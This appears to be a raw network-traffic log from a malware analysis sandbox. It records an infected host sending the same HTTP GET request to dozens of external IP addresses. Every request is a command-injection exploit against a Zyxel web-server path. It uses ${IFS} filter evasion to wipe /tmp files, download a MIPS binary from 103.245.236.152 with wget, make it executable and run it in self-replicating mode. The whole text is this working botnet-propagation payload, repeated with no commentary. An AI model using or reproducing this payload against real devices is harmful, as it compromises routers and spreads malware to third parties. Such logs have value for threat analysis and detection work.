                                            Jan 14, 2024 15:50:56.772355080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8877192.168.2.234255438.38.199.250443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.772392988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8878192.168.2.234397891.245.242.8443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.772434950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8879192.168.2.2345674200.45.27.225443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.772506952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8880192.168.2.2341980123.51.216.146443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.772546053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8881192.168.2.2357060196.99.162.254443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.772589922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8882192.168.2.234221468.186.40.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.772634983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8883192.168.2.2358360208.48.170.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.772694111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8884192.168.2.2335844193.66.240.184443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.772735119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8885192.168.2.2341258189.239.100.140443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.772764921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8886192.168.2.2349450193.40.230.202443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.772816896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8887192.168.2.2337674148.205.37.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.772867918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8888192.168.2.234146283.186.152.124443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.772902012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8889192.168.2.2358044153.44.184.162443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.772945881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8890192.168.2.235750427.26.117.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.773005962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8891192.168.2.2340470218.234.32.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.773061037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8892192.168.2.23347122.0.217.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.773123980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8893192.168.2.2359358179.195.177.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.773183107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8894192.168.2.235562474.248.162.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.773246050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8895192.168.2.234689486.155.64.146443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.773292065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8896192.168.2.2334048101.108.75.117443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.773320913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8897192.168.2.234743848.60.175.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.773372889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8898192.168.2.2353556184.232.20.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.773428917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8899192.168.2.2355940182.63.22.225443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.773478031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8900192.168.2.2334356167.47.163.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.773507118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8901192.168.2.234714654.171.11.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.773525953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8902192.168.2.235666871.219.255.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.773540974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8903192.168.2.2355982139.121.122.93443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.773617029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8904192.168.2.234303061.182.219.49443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.773658037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8905192.168.2.23372265.80.214.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.773696899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8906192.168.2.233455614.176.20.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.773721933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8907192.168.2.234634648.3.162.29443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.773792982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8908192.168.2.233512413.175.45.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.773845911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8909192.168.2.233711090.196.62.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.773879051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8910192.168.2.2348948185.196.125.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.773932934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8911192.168.2.234374451.9.98.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.773957968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8912192.168.2.2341806203.109.249.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.774029970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8913192.168.2.2341342112.210.197.133443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.774058104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8914192.168.2.2348498110.33.129.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.774132013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8915192.168.2.2354816181.81.72.24443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.774178028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8916192.168.2.2345308199.106.106.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.774230003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8917192.168.2.233836023.180.70.83443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.774276972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8918192.168.2.2335520219.155.191.123443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.774316072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8919192.168.2.2333788126.122.220.95443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.774350882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8920192.168.2.2352046179.255.151.34443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.774410963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8921192.168.2.2357590150.185.30.83443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.774450064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8922192.168.2.233766427.215.245.213443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.774514914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8923192.168.2.235185098.1.126.203443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.774544001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8924192.168.2.235053268.190.14.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.774579048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8925192.168.2.2341402213.215.42.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.774595976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8926192.168.2.2341700186.87.99.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.774651051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8927192.168.2.23557129.239.34.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.774682999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8928192.168.2.234414697.90.28.249443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.774754047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8929192.168.2.233307019.251.180.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.774776936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8930192.168.2.235054071.99.93.119443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.774816036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8931192.168.2.2352042143.201.163.78443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.774849892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8932192.168.2.2341814203.28.77.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.774899006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8933192.168.2.234731298.13.59.35443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.774930954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8934192.168.2.234962425.132.47.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.774986029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8935192.168.2.235513272.67.232.235443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.775031090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8936192.168.2.2357664152.149.99.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.775082111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8937192.168.2.235221086.63.3.165443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.775130987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8938192.168.2.2344166188.92.254.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.775188923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8939192.168.2.2341240185.144.0.145443
                                            TimestampBytes transferredDirectionData
